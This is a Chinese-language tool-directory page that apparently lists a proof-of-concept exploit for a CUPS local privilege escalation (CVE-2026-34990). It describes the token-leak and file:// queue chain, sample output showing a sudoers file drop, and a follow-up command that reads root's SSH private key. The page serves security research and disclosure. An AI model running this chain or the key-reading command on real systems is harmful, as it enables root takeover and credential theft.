Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-34990 — 针对 OpenPrinting CUPS 中 CVE-2026-34990 的 Python 概念验证,通过 file:// 打印机队列强制 cupsd 泄露 Local 认证令牌并覆盖 root 文件。 | Kitploit
工具/GitHubGitHub/ungabunga-ctf/cve-2026-34990
权限提升漏洞分析漏洞利用安全虚拟化渗透测试
GitHubungabunga-ctf/cve-2026-34990

CVE-2026-34990

针对 OpenPrinting CUPS 中 CVE-2026-34990 的 Python 概念验证,通过 file:// 打印机队列强制 cupsd 泄露 Local 认证令牌并覆盖 root 文件。

查看仓库
112天前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-34990

描述

CVE-2026-34990 - OpenPrinting CUPS 2.4.16 及更早版本中,本地非特权用户可诱使 cupsd 使用可重复使用的 Authorization: Local ... 令牌向攻击者控制的 localhost IPP 服务进行身份验证。该令牌足以在 localhost 上驱动 /admin/ 请求,攻击者可以将 CUPS-Create-Local-Printer 与 printer-is-shared=true 结合使用,从而持久化一个 file:///... 队列,即使正常的 FileDevice 策略会拒绝此类 URI。向该队列打印会导致任意 root 文件覆盖;下面的 PoC 利用这一原语投放一个 sudoers 片段,并演示 root 命令执行。在发布时,尚无公开可用的补丁。

安装

git clone https://github.com/ungabunga-ctf/CVE-2026-34990
cd CVE-2026-34990

运行

python3 CVE-2026-34990.py

示例

python3 CVE-2026-34990.py
CVE-2026-34990 CUPS PoC
[*] Target file: /etc/sudoers.d/aporter
[*] Starting token capture server...
[+] Captured Local token: 7BD0ECC9D367025E50774E0BB08F7B5E
[*] Creating file:// printer...
[+] Vulnerable!
...
...

然后:

sudo -n cat /root/.ssh/id_rsa
下载工具